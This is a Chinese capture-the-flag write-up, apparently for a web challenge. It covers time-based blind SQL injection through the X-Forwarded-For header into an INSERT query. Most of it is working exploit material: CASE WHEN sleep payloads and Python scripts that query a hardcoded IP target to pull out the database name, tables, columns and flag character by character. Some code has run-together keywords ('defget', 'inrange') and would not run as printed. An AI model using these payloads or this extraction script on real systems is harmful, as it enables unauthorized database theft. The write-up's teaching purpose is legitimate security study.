用法:CASE value WHEN [compare_value] THEN result [WHEN [compare_value] THEN result ...] [ELSE result] END,比如:我现在使用的库是test:
可以看到实现了与if()相同的效果。下来我们先在bp里实验一下。
实验
直接在bp截包,修改XFF信息:
发现没有任何报错。。。只能换方法了,使用时间盲注试试。我们构造:'+(select case when (substring((select database()) from 1 for 1)='?') then sleep(5) else 1 end) and '1'='1,这样的话原句就会变成这样:insert into client_ip (ip) values (''+(select case when (substring((select database()) from 1 for 1)='?') then sleep(5) else 1 end) and '1'='1')。
characters = string.ascii_letters + string.digits max_length = 50 target = 'http://123.206.87.240:8002/web15/' defget_database(): flag = '' for i inrange(1, max_length): next_position = False for char in characters:
payload = "'+(select case when (substring((select database() ) from %s for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(i,char) headers = { 'X-Forwarded-For': payload } try: r = requests.get(target,headers=headers,timeout=4) except requests.exceptions.ReadTimeout: flag += char print(flag) next_position = True break ifnot next_position: return flag
characters = string.ascii_letters + string.digits + string.punctuation max_length = 50 target = 'http://123.206.87.240:8002/web15/' cur_database = "'+(select case when (substring((select database() ) from {0} for 1)='{1}') " \ "then sleep(4) else 1 end) and '1'='1"
# 猜解字母 defget(payload): flag = '' for i inrange(1, max_length): # i 表示了所要查找的名字的最大长度 next_position = False for char in characters: # 0x80=128 , 0x20=32, 32-128为可显示的字符的区间
payload_ = payload.format(str(i), char) headers = { 'X-Forwarded-For': payload_ } try: r = requests.get(target,headers=headers,timeout=4) except requests.exceptions.ReadTimeout: flag += char print(flag) next_position = True break ifnot next_position: return flag
# 指定数据库,获取其下全部表名 defget_table(database): for i inrange(0,5): print("正在查询数据库" + database + "中的表") payload = "'+(select case when (substring((" \ "select table_name from information_schema.tables where table_schema='"+ database + "' limit 1 offset "+ str(i) +") " \ "from {0} for 1)='{1}') " \ "then sleep(4) else 1 end) and '1'='1" table = get(payload) print( "数据库" + database + "的第"+ str(i+1) +"个表"+table) get_col(table)
# 查字段 defget_col(table): for i inrange(0,5): print("正在查询表" + table + "中的字段") payload = "'+(select case when (substring((" \ "select column_name from information_schema.columns where table_name='"+ table +"' limit 1 offset "+ str(i) +") " \ "from {0} for 1)='{1}') " \ "then sleep(4) else 1 end) and '1'='1" column = get(payload) print("表" + table + "的第" + str(i+1) + "个字段为" + column ) # print(column) ifnot column: print("表" + table + "中的字段查询完毕") break
# 作为单独的模块使用吧,获取字段详细信息 defresult(column,table): payload = "'+(select case when (substring((select "+column+" from "+table+") from {0} for 1)='{1}') " \ "then sleep(4) else 1 end) and '1'='1" print(get(payload)) a = 'flag' result(a,a)
if __name__ == "__main__": database1 = get(cur_database) table1 = get_table(database1)
v1.5.2